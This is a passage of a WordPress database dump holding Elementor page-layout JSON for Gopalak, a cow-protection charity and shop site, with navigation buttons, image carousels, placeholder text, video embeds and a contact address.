\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10307,1721,'_elementor_page_assets','a:0:{}'),(10310,1722,'_elementor_edit_mode','builder'),(10311,1722,'_elementor_template_type','wp-page'),(10312,1722,'_elementor_version','3.7.8'),(10313,1722,'_wp_page_template','elementor_canvas'),(10314,1722,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhq